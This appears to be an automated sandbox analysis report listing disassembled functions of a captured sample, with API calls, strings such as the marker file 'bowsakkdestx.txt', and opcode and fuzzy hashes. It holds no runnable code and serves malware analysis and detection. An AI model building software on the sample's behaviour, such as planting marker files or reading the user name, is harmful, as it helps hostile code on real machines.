                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 1380987712-0
                                                                                                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 4104443479-4289949731
                                                                                                • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 4104443479-4289949731
                                                                                                • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                • API String ID: 2102423945-2013712220
                                                                                                • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                APIs
                                                                                                Strings
                                                                                                • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: StringUuid$CreateFree
                                                                                                • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                • API String ID: 3044360575-2335240114
                                                                                                • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                APIs
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path$AppendFolder
                                                                                                • String ID: bowsakkdestx.txt
                                                                                                • API String ID: 29327785-2616962270
                                                                                                • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 00423B64
                                                                                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00550000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                • String ID: bad allocation
                                                                                                • API String ID: 3074076210-2104205924
                                                                                                • Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                                • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                • Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                                • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                APIs
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCursorLoadRegister
                                                                                                • String ID: 0$LPCWSTRszWindowClass
                                                                                                • API String ID: 1693014935-1496217519
                                                                                                • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                APIs
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path$AppendDeleteFileFolder
                                                                                                • String ID: bowsakkdestx.txt
                                                                                                • API String ID: 610490371-2616962270
                                                                                                • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: p2Q
                                                                                                • API String ID: 2102423945-1521255505
                                                                                                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                                                                                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove_strtok
                                                                                                • String ID:
                                                                                                • API String ID: 3446180046-0
                                                                                                • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 2974526305-0
                                                                                                • Opcode ID: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                • Opcode Fuzzy Hash: 225b5b572bde38d8badb4302925c97bbda5b3bc979f66d9100de26b3352a814c
                                                                                                • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 1421093161-0
                                                                                                • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                                • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                  • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                  • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 2901542994-0
                                                                                                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                                APIs
                                                                                                  • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                  • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                  • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                • __lock.LIBCMT ref: 00425A37
                                                                                                • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                • __lock.LIBCMT ref: 00425A57
                                                                                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                • String ID:
                                                                                                • API String ID: 2580527540-0
                                                                                                • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                • String ID:
                                                                                                • API String ID: 3016257755-0
                                                                                                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                • _malloc.LIBCMT ref: 004127C3
                                                                                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00550000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                • _memset.LIBCMT ref: 004127CE
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 2824100046-0
                                                                                                • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                                • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                                • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32 ref: 00412806
                                                                                                • _malloc.LIBCMT ref: 00412814
                                                                                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00550000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                • _memset.LIBCMT ref: 0041281F
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 2824100046-0
                                                                                                • Opcode ID: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                                                                                • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                • Opcode Fuzzy Hash: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                                                                                                • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 4104443479-4289949731
                                                                                                • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 4104443479-4289949731
                                                                                                • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                APIs
                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                  • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
